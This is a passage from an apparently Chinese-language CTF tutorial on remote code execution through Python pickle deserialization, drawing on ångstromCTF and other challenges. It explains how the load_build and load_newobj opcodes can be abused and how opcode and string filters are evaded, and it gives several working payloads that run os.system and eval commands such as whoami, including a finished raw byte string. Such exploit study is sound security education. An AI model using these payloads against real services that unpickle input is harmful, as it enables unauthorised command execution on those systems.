        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build

在上面篡改函数字节码中,我们用到的是 load_build 中走向 setattr 的判断分支。但注意观察可以发现, 在下面的这个分支中, setstate 和 state 其实都是可控的,因此这里可以执行任意函数。

        if setstate is not None:
            setstate(state)
            return

追溯 setstate 的来源可以发现,load_build 首先获取栈上的字节码 b 前的一个元素。然后获取其 __setstate__ 属性的值,如果这个属性存在,则把这个属性的值当作函数来执行。

def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return

具体的利用流程如下:

  1. 导入一个已有的类并且将其 __setstate__ 设置为危险函数,例如 os.system
  2. 实例化这个类
  3. 向栈上压入参数,然后执行 BUILD 操作触发 load_build 中的方法调用。

下面我们一步一步来构造 payload:

测试环境为一个 db.py,其中包含了一个 User 类。如下的代码取自 ångstromCTF 2021 ekans

import pickle
import base64
import io
import os

POKEMON = {id: (os.environ.get('FLAG', 'flag{TEST}') if id == 1337 else 'EKANS') for id in range(2000)}
USERS = {'guest': 'guest', 'PokeMaster3000': os.environ.get('ADMIN_PASSWORD', '<secret>')}
ADMINS = ['PokeMaster3000']

class User:
	admin = False

	def __init__(self, username='guest', password='guest'):
		self.username = username
		self.password = password
		if username in ADMINS: self.admin = True

	def is_admin(self): return self.authenticated() and self.admin

	def authenticated(self): return self.password == USERS.get(self.username)

class SafeUnpickler(pickle.Unpickler):
	def find_class(self, module, name):
		if module == "db" and name == "User": return User
		raise pickle.UnpicklingError(f"HACKING DETECTED")

load_user = lambda request: SafeUnpickler(io.BytesIO(base64.b64decode(request.cookies['user'].encode('utf-8')))).load()

第一步:修改已有类的 __setstate__

在前面利用代码对象篡改函数时,我们使用如下的 payload 对某个类的属性进行篡改:

p = GLOBAL + b'__main__\nSnakeWindow\n' + \
    NONE + \
    MARK + \
        UNICODE + b'__code__\n' + \
        UNICODE + b'bbbb\n' + \
        DICT + \
    TUPLE2 + \
    BUILD + \
    STOP

同样的,这里可以编写类似的 payload 修改 db.User 的 __setstate__ 属性。

p = PROTO + b'\x04' + \
    GLOBAL + b'db\nUser\n' + \
    NONE + \
        MARK + \
            UNICODE + b'__setstate__\n' + \
            GLOBAL + b'os\nsystem\n' + \
            DICT + \
        TUPLE2 + \
    BUILD + \
    STOP

# >>> a
# <class 'db.User'>
# >>> a.__setstate__
# <built-in function system>

第二步:实例化这个类

实例化这个类我们可以使用 OBJ 操作码,注意需要在前面加入 MAKR

p = PROTO + b'\x04' + \
    MARK + \
    GLOBAL + b'db\nUser\n' + \
    NONE + \
        MARK + \
            UNICODE + b'__setstate__\n' + \
            GLOBAL + b'os\nsystem\n' + \
            DICT + \
        TUPLE2 + \
    BUILD + \
    OBJ + \

# >>> a
# <db.User object at 0x7f0a618bf790>

这样我们就得到了这个类的实例。

第三步:压入参数并执行 BUILD

构造好对象之后,我们只需要再往栈上压入参数,如 “id”, 然后再次触发 load_build 即可。下面是最终的 payload:

p = PROTO + b'\x04' + \
    MARK + \
    GLOBAL + b'db\nUser\n' + \
    NONE + \
        MARK + \
            UNICODE + b'__setstate__\n' + \
            GLOBAL + b'os\nsystem\n' + \
            DICT + \
        TUPLE2 + \
    BUILD + \
    OBJ + \
    UNICODE + b'id\n' + \
    BUILD + \
    STOP

可以发现只要进行了反序列化,就会触发命令执行。

利用 load_newobj RCE

上面的 load_build 方法存在一个缺陷,必须要能够先实例化一个类才可以进行利用,假如环境中没有这样的一个类呢?为了解决这个问题,可以利用 load_newobj 函数。

load_newobj 函数对应的是 NEWOBJ 操作码的行为, NEWOBJ 操作码的值为 b'\x81', 这个操作码会根据提供的参数,调用类的 __new__ 方法,函数内容如下:

    def load_newobj(self):
        args = self.stack.pop()
        cls = self.stack.pop()
        obj = cls.__new__(cls, *args)
        self.append(obj)
    dispatch[NEWOBJ[0]] = load_newobj

可以看到 cls 和 args 都是可控的,如果某个类的 __new__ 方法可以执行任意命令,那么就可以配合 NEWOBJ 操作码在反序列化使达成 RCE。美团CTF 2022 ezpickle 和 蓝帽杯2022 file_session 这两道题目的解题思路就是利用了这个点。

利用 payload 如下:bytes 类和 tuple 类的 __new__ 方法可以接收一个迭代器对象。若此时我们使用 map 去构造一个绑定了危险函数的迭代器,在调用__new__时,就会触发命令执行。

bytes.__new__(bytes, map.__new__(map, eval, ['print(1)']))
bytes.__new__(bytes, map.__new__(map, os.system, ['ls']))

通过上面的方法可以在仅使用内置类的情况下完成 RCE。

a = map(os.system,['ls'])

builtins 中一共有三个类可以满足这个条件:bytes、tuple、frozenset

>>> a = map(os.system,['ls'])
>>> frozenset.__new__(frozenset,a)
>>> a = map(os.system,['ls'])
>>> bytes.__new__(bytes,a)
>>> a = map(os.system,['ls'])
>>> tuple.__new__(tuple,a)

后面的 map 也可以采用 __new__ 来构建:

bytes.__new__(bytes,map.__new__(map,os.system,'whoami'))

接着就可以构造反序列化 payload:

首先我们需要构建一个 map 对象。

p = PROTO + b'\x02' + \
        GLOBAL + b'builtins\nmap\n' + \
            GLOBAL + b'os\nsystem\n' + \
                MARK + \
                UNICODE + b'whoami\n' + \
                LIST + \
            TUPLE2 + \
        NEWOBJ + \
    STOP

pickletools.dis(p)
a = loads(p)
print(a)
# <map object at 0x7fc616fe7310>

获取到这个 map 之后,导入 bytes,然后调用 NEWOBJ:

p = PROTO + b'\x02' + \
    GLOBAL + b'builtins\nbytes\n' + \
        GLOBAL + b'builtins\nmap\n' + \
            GLOBAL + b'os\nsystem\n' + \
                MARK + \
                UNICODE + b'whoami\n' + \
                LIST + \
            TUPLE2 + \
        NEWOBJ + \
    TUPLE1 + \
    NEWOBJ + \
    STOP

绕过操作码过滤

绕过字符串过滤

如果某些题目需要覆盖特定的变量,但是将变量名进行了过滤,例如要覆盖 __main__ secret.key. 但是将 key 这个字符串进行了过滤。那么我们可以通过字符串变换来绕过。

V 操作码

V 操作码表示 unicode 编码

c__main__
secret
(V\u006bey  #key
S'asd'
db.

十六进制

十六进制也可以绕过

c__main__
secret
(S'\x6bey'  #key
S'asd'
db.

绕过 R 操作码过滤

除了 REDUCE 操作码可以执行函数之外,还有其他两种执行函数的方法。

  1. 通过 b’i’ 调用:
     INST('os', 'system', 'whoami')
    
  2. 通过 b’c’ 与 b’o’ 调用:
     OBJ(GLOBAL('os', 'system'), 'whoami')
    

下面是 Code-Breaking 那道题原本的 payload 为:

getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()
__builtins__ = dict_get(builtins, '__builtins__')
eval = getattr(__builtins__, 'eval')
eval('__import__("os").system("whoami")')
return

转化为 OBJ 的构造方式:

getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = OBJ(getattr, dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = OBJ(globals)
__builtins__ = OBJ(dict_get, builtins, '__builtins__')
eval = OBJ(getattr,__builtins__, 'eval')
return OBJ(eval,'__import__("os").system("whoami")')

b'cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0(g0\ng1\nS\'get\'\nop2\n0cbuiltins\nglobals\np3\n0(g3\nop4\n0(g2\ng4\nS\'__builtins__\'\nop5\n0(g0\ng5\nS\'eval\'\nop6\n0(g6\nS\'__import__("os").system("whoami")\'\no.'

参考